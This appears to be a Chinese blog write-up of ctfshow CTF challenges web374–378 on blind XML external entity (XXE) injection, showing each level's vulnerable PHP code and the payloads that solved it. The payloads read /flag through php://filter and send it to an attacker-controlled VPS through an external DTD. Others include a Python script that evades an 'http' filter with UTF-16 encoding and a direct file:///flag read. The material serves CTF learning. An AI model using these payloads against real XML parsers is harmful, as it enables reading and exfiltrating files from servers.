xxe漏洞——无回显(ctfshow web374——378)

最新推荐文章于 2024-08-01 20:34:53 发布
最新推荐文章于 2024-08-01 20:34:53 发布
阅读量510 收藏 8
点赞数 5
文章标签: android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73756016/article/details/139448961
版权

ctfshow——web374

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2021-01-07 12:59:52
# @Last Modified by:   h1xa
# @Last Modified time: 2021-01-07 13:36:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(isset($xmlfile)){
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
}
highlight_file(__FILE__);

比上题少了几行代码,分别是
$creds = simplexml_import_dom($dom); $ctfshow = $creds->ctfshow; echo $ctfshow;

导致了这题可以注入实体但是没有回显,所以我们考虑数据外带。访问一个请求,把数据加到请求上。

payload

<!DOCTYPE hacker[
    <!ENTITY  % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
//参数实体 运用php伪协议读取flag
    <!ENTITY  % myurl SYSTEM "http://*******:1338/test.dtd">
//参数实体 外部引用自己vps上的dtd文件
    %myurl;
//引用参数
]>
<root>
1
</root>

在自己的vps上的test.dtd文件脚本

<!ENTITY % all "<!ENTITY &#x25; send  SYSTEM 'http://121.43.149.212:1337/%file;'> ">
%all;
%send;


//解析后相当于
<!ENTITY % all "<!ENTITY &#x25; send  SYSTEM 'http://121.43.149.212:1337/%file;'> ">
<!ENTITY &#x25; send  SYSTEM 'http://121.43.149.212:1337/%file;'> 
http://121.43.149.212:1337/%file;


<!DOCTYPE hacker[
    <!ENTITY  % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
//参数实体 运用php伪协议读取flag

http://121.43.149.212:1337/%file;
]>

最后的引用来引用去的代码就相当于

请求访问攻击者服务器的1337端口

并且携带%file的参数

我们打开1338端口 使靶机能够正常访问

再监听1337端口

查看我们flag的值

解码可得flag

web375


error_reporting(0);
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(preg_match('/<\?xml version="1\.0"/', $xmlfile)){
    die('error');
}
if(isset($xmlfile)){
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
}
highlight_file(__FILE__);

相比上题过滤了<?xml version="1.0">

但是我看我上题的payload也没有<\?xml version="1.0">

证明就是可以直接不要xml头然后绕过

绕过方法二:

空格绕过,我多打一个空格在?xmlversion之间就好了。题目过滤的字符串,两个之间只有一个空格,我多打一个就变成了两个,不影响功能同时也绕过了过滤。

web376

和上面那题比多过滤了大小写

我们直接不加头

管他

web377


error_reporting(0);
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(preg_match('/<\?xml version="1\.0"|http/i', $xmlfile)){
    die('error');
}
if(isset($xmlfile)){
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
}
highlight_file(__FILE__);

比上题多ban了http

用python发请求

多个编码

import requests
url = 'https://eb566b22-4657-4de5-b251-7ddaded69bf8.challenge.ctf.show/'
data = '''
<!DOCTYPE hacker[
    <!ENTITY  % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
    <!ENTITY  % myurl SYSTEM "http://121.43.149.212:1338/test.dtd">

    %myurl;
]>
'''
r = requests.post(url=url,data=data.encode('utf-16'))

web378

和那个xxe lab撞js了;;;

用之间文件任意读取脚本


<!DOCTYPE root [
<!ELEMENT root ANY>
<!ENTITY xxe SYSTEM "file:///flag">
]>
<user><username>&xxe;</username><password>1</password></user>

阿呆不呆@qq
关注
  • 5
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【1day】复现泛微OA e-cology XXE 漏洞——可读取任意文件
记录并分享学习安全的知识点..
07-14 2626
泛微e-cology是一款由泛微网络科技开发的协同管理平台,支持人力资源、财务、行政等多功能管理和移动办公。泛微e-cology某处功能点最初针对用户输入的过滤不太完善,导致在处理用户输入时可触发XXE。后续修复规则依旧可被绕过,本次漏洞即为之前修复规则的绕过。攻击者可利用该漏洞列目录、读取文件,甚至可能获取应用系统的管理员权限。
【1day】复现深信服数据中心管理系统 XXE漏洞——可读取文件
记录并分享学习安全的知识点..
08-16 410
深信服的数据中心管理系统DC是一种外置的AC(异地扩展备份管理)数据中心,它提供了强大的功能和灵活性,旨在满足日志数据处理的需求。该系统具备多种高级功能,包括多条件组合的高效查询、统计和生成趋势报表,以及实时监控设备的运行状态等。深信服数据中心管理系统存在XXE漏洞
CTFshow XXE(web373-378)
Kradress的博客
03-18 549
post提交,这里外部引入vps的dtd文件。抓包发现username处存在回显。base64解码拿到flag。直接套八股文,拿到flag。这里需要一个根节点来包含。这里用python脚本。这里可以外部引入一个。
ctfshow web入门 XXE web373~web378
qq_62989306的博客
09-13 1167
burpsuite发包,不能用hackbar[POST]Payload: &xxe;
CTFSHOW-web373-378
最新发布
qq_52579508的博客
08-01 414
在vps上创建一个test.dtd文件,用于反弹shell,内容如下。要绕过 http 就要进行编码绕过 编码为 utf-16。和上题的代码差别不大 ,但是没有输出了,无回显数据。要使用远程服务器 加载 dtd文件。VPS收到flag的base64。以及可以使用这个payload。上面的payload 不行了。这里他不能带有 http了。查看flag的payload。输入的内容不能带那个。
ctfshow XXE web373-web378 wp
mumuzi的博客
02-11 1768
文章目录web373web374-376web377web378 web373 XXE(XML External Entity Injection) 全称为 XML 外部实体注入。注入的是XML外部实体 参考文章:一篇文章带你深入理解漏洞XXE 漏洞 libxml_disable_entity_loader(false);:禁止加载外部实体。一个实体由三部分构成: 一个和号 (&), 一个实体名称, 以及一个分号 ( ; ) flag在flag里 <?xml version="1.0"
回显XXE攻击:隐秘的数据泄露技术
weixin_43822401的博客
06-14 564
回显XXE攻击是一种隐蔽的数据泄露手段,攻击者可以在不引起目标服务器注意的情况下获取敏感信息。了解这种攻击的原理和防御策略对于保护网络安全至关重要。通过本文的介绍,希望读者能够提高对无回显XXE攻击的认识,并采取相应的防护措施。
Ctfshow web入门 XXE 模板注入篇 web373-web378 详细题解 全
Jay17的博客
08-07 2297
Ctfshow web入门 XXE 模板注入篇 web373-web378 详细题解 全
第五节 XXE漏洞利用 - 任意文件读取 无回显 -01
09-15
XXE 漏洞利用 - 任意文件读取 无回显 XXE(XML External Entity)是一种常见的 Web 应用程序漏洞,攻击者可以通过构造恶意的 XML 文档, trick 服务器将任意文件读取出来,导致敏感信息泄露。在本节中,我们将详细...
WEB漏洞——XXE
qq_63594215的博客
04-12 886
本次文章主要介绍XXE漏洞的原理,利用以及防御的过程,另外还有介绍一点XML的基础知识,详情请见下文。a) xml,eXtensible Markup Language,可扩展标记语言,是一种标记语言,使用简单标记描述数据b) xml是一种非常灵活的语言,没有固定的标签,所有标签都可以自定义c) 通常,xml被用于信息的传递和记录,因此,xml经常被用于充当配置文件如果把HTML和XML进行对比的话,HTML进行对比的话,HTML旨在显示数据信息,而XML旨在用来进行数据的传输和存储。
未知攻焉知防——XXE漏洞攻防.pdf
09-18
XXE漏洞全称为XML External Entity Injection,即XML外部实体注入漏洞,是一种在应用程序中处理XML数据时出现的安全漏洞。本文将详细介绍XML的基础知识、XXE漏洞的攻击原理、影响以及防御措施。 XML(可扩展标记...
CTFshow_Web_XXE——web373~377
Ho1aAs‘s Blog
05-07 2397
文章目录参考文章题解web373web374~376web377完 参考文章 一篇文章带你深入理解漏洞XXE 漏洞 未知攻焉知防——XXE漏洞攻防 题解 web373 常规XXE flag的路径是/flag // 允许加载外部实体 libxml_disable_entity_loader(false); // xml文件来源于数据流 $xmlfile = file_get_contents('php://input'); if(isset($xmlfile)){ $dom = new DOMDo
CTFshow——XXE
D.MIND 的博客
08-23 848
web373 <?php error_reporting(0); libxml_disable_entity_loader(false); $xmlfile = file_get_contents('php://input'); if(isset($xmlfile)){ $dom = new DOMDocument(); $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD); $creds = simplexml_i
ctfshow-XXE(web373-web378)
m0_72125469的博客
03-11 1169
ctfshow web373 web374 web375 web376 web377 web378
浅析罗尔斯的无知之幕论文/浅析无回显XXE(Blind XXE)_小白黑客详细教程
2401_84915584的博客
05-17 421
xml介绍XML是一种非常流行的标记语言,在解析外部实体的过程中,XML解析器可以根据URL中指定的方案(协议)来查询各种网络协议和服务(DNS,FTP,HTTP,SMB等)。
CTFSHOW-web入门-XXE
whisper921的博客
04-23 5856
XML XML即 可扩展标记语言(EXtensible Markup Language),是一种标记语言,其标签没有预定义,您需要自行定义标签,是W3C的推荐标准。其于HTML的区别是: HTML 被设计用来显示数据 XML 被设计用来传输和存储数据 XML文档结构包括: XML声明 DTD文档类型定义(可选) 文档元素 XML是一种非常流行的标记语言,在1990年代后期首次标准化,并被无数的软件项目所采用。它用于配置文件,文档格式(如OOXML,ODF,PDF,RSS,...),图像格式(SV
ctfshow web入门-XXE
LYJ20010728的博客
09-10 1666
ctfshow web入门-XXEweb373题目描述解题思路web374题目描述解题思路web375题目描述解题思路web376题目描述解题思路web377题目描述解题思路web378题目描述解题思路 web373 题目描述 开X 解题思路 题目给出源码,一个有回显的文件读取漏洞 <?php error_reporting(0); libxml_disable_entity_loader(false); $xmlfile = file_get_contents('php://inpu
【Web】CTFSHOW XXE刷题记录(全)
uuzeray的博客
02-26 695
用的多的就是外部实体声明和参数实体声明。
XXE漏洞实战:无回显任意文件读取训练
在本章节中,我们将深入探讨XXE(XML External Entity)漏洞的一种常见利用方法——任意文件读取,且特别强调的是无回显场景。XXE漏洞是由于Web应用程序在解析XML文档时,对外部实体(External Entity)处理不当,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值